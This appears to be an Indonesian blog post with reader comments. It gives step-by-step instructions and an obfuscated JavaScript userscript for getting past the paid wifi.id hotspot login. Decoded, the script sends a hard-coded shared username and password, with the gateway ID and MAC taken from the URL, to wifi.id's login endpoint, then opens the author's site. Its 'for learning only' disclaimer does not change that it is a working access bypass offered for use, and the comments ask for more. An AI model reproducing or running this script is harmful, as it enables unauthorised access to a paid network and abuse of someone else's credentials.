Tahu wifi.id ? itu tuh layanan hotspot berbayar yang disediakan Telkom. Biasanya di tempat-tempat umum seperti cafe, mall, atau Plasa Telkom sendiri.
Konsepnya yakni meng-inject halaman login wifi.id sehinga tanpa login bisa internetan :)
Ok ini sebagai pembelajaran saja. Saya tidak bertangungjawab atas penyalahgunaan script injector berikut ini. Langsung saja.
masukkan script di bawah ini lalu tekan enter, jika sukses terinjeksi maka akan muncul message box.
Konsepnya yakni meng-inject halaman login wifi.id sehinga tanpa login bisa internetan :)
Ok ini sebagai pembelajaran saja. Saya tidak bertangungjawab atas penyalahgunaan script injector berikut ini. Langsung saja.
Jika menggunakan browser Google Chrome, tekan :
CTRL + SHIFT + J
Jika menggunakan browser Mozilla tekan :
CTRL + SHIFT + K
Lalu pilih tab consolemasukkan script di bawah ini lalu tekan enter, jika sukses terinjeksi maka akan muncul message box.
// ==UserScript== // @name @wifi.id login bypasser // @namespace http://www.dxdiag.co.uk // @version 3 // @description Connect ke wifi.id tanpa login :) // @new feature Auto detect welcome. ex welcome9 welcome2 etc. // @author MrDxdiag // @match http://*.wifi.id/* // @downloadURL http://pastebin.com/raw/HmuDQKwF // @updateURL http://pastebin.com/raw/HmuDQKwF // @grant none // ==/UserScript== /* jshint -W097 */ 'use strict'; // @wifi.id login by MrDxdiag // God Bless Us // www.mydxdiag.com /* * Tutorial sudah banyak di google, tapi hanya script ini yg official * mydxdiag.com * Semua karya berharga, tolong di hargai pembuatnya. * Karya bukan ajang untuk cari nama, tapi untuk berbagi dengan sesama. * Lebih baik dikenal daripada terkenal :) */ var _0xa7a5=["\x5C\x5D","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x5B","\x5B\x5C\x3F\x26\x5D","\x3D\x28\x5B\x5E\x26\x23\x5D\x2A\x29","\x73\x65\x61\x72\x63\x68","\x65\x78\x65\x63","","\x20","\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x40\x77\x69\x66\x69\x2E\x69\x64\x20\x69\x6E\x6A\x65\x63\x74\x6F\x72\x20\x76\x33\x20\x0A\x20\x5B\x2B\x5D\x20\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x6D\x65\x6C\x6F\x6E\x2E\x6D\x65\x6C\x6F\x6E\x40\x65\x76\x65\x6E\x74","\x67\x77\x5F\x69\x64","\x63\x6C\x69\x65\x6E\x74\x5F\x6D\x61\x63","\x75\x73\x65\x72\x6E\x61\x6D\x65\x3D","\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D\x6D\x65\x6C\x6F\x6E\x26\x67\x77\x5F\x69\x64\x3D","\x26\x6D\x61\x63\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x74\x2E\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D\x2F\x77\x69\x66\x69\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x6C\x63\x6F\x6D\x65\x32\x2E\x77\x69\x66\x69\x2E\x69\x64\x2F\x61\x75\x74\x68\x6E\x65\x77\x2F\x6C\x6F\x67\x69\x6E\x2F\x63\x68\x65\x63\x6B\x5F\x6C\x6F\x67\x69\x6E\x2E\x70\x68\x70\x3F","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x70\x61\x72\x73\x65","\x72\x65\x73\x75\x6C\x74","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x52\x65\x73\x75\x6C\x74\x20\x3A\x20\x46\x61\x69\x6C\x65\x64\x20\x5B\x2B\x5D","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x50\x6C\x65\x61\x73\x65\x20\x43\x68\x65\x63\x6B\x20\x74\x68\x65\x20\x63\x6F\x6E\x66\x69\x67\x20\x26\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x6D\x65\x20\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x52\x65\x73\x75\x6C\x74\x20\x3A\x20\x53\x75\x63\x63\x65\x73\x73\x20\x5B\x2B\x5D","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x45\x6E\x6A\x6F\x79\x20\x74\x68\x65\x20\x72\x65\x61\x6C\x20\x66\x72\x65\x65\x20\x77\x69\x66\x69\x2E\x69\x64\x20\x62\x79\x20\x4D\x72\x44\x78\x64\x69\x61\x67","\x72\x65\x6C\x6F\x61\x64","\x5F\x6E\x65\x77","\x68\x72\x65\x66","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x45\x72\x72\x6F\x72","\x73\x65\x6E\x64"];function getParam(_0x64f3x2){_0x64f3x2= _0x64f3x2[_0xa7a5[1]](/[\[]/,_0xa7a5[2])[_0xa7a5[1]](/[\]]/,_0xa7a5[0]);var _0x64f3x3= new RegExp(_0xa7a5[3]+ _0x64f3x2+ _0xa7a5[4]),_0x64f3x4=_0x64f3x3[_0xa7a5[6]](location[_0xa7a5[5]]);return _0x64f3x4=== null?_0xa7a5[7]:decodeURIComponent(_0x64f3x4[1][_0xa7a5[1]](/\+/g,_0xa7a5[8]))}function randomString(_0x64f3x6,_0x64f3x7){_0x64f3x7= _0x64f3x7|| _0xa7a5[9];var randomString=_0xa7a5[7];for(var _0x64f3x8=0;_0x64f3x8< _0x64f3x6;_0x64f3x8++){var _0x64f3x9=Math[_0xa7a5[12]](Math[_0xa7a5[10]]()* _0x64f3x7[_0xa7a5[11]]);randomString+= _0x64f3x7[_0xa7a5[13]](_0x64f3x9,_0x64f3x9+ 1)};return randomString}alert(_0xa7a5[14]);var usr=_0xa7a5[15];var gw_id_dxd=getParam(_0xa7a5[16]);var mac_dxd=getParam(_0xa7a5[17]);var params=_0xa7a5[18]+ usr+ _0xa7a5[19]+ gw_id_dxd+ _0xa7a5[20]+ mac_dxd;var blog=_0xa7a5[21];var check_me=_0xa7a5[22];var url=_0xa7a5[23]+ params;var http= new XMLHttpRequest();http[_0xa7a5[25]](_0xa7a5[24],url,true);http[_0xa7a5[28]](_0xa7a5[26],_0xa7a5[27]);http[_0xa7a5[29]]= function(){if(http[_0xa7a5[30]]== 4&& http[_0xa7a5[31]]== 200){var _0x64f3x12=http[_0xa7a5[32]];obj= JSON[_0xa7a5[33]](_0x64f3x12);var _0x64f3x13=obj[_0xa7a5[34]];var _0x64f3x14=true;if(_0x64f3x13== 0){alert(_0xa7a5[35]);alert(_0xa7a5[36])}else {if(_0x64f3x13== 1){alert(_0xa7a5[37]);alert(_0xa7a5[38]);location[_0xa7a5[39]];window[_0xa7a5[25]](blog,_0xa7a5[40]);location[_0xa7a5[41]]= _0xa7a5[42];window[_0xa7a5[25]](check_me,_0xa7a5[40])}else {if(_0x64f3x13== 2){alert(_0xa7a5[43])}else {alert(_0xa7a5[43])}}}}};http[_0xa7a5[44]](params)
oke, nanti saya coba
ReplyDeleteklu tuk yg wms ada gak om,matr suwun
ReplyDeletemas kalau memasukan script di mikrotik itu bagae mna atau bikinin tutorial auto login di mikrotik... makasi
ReplyDelete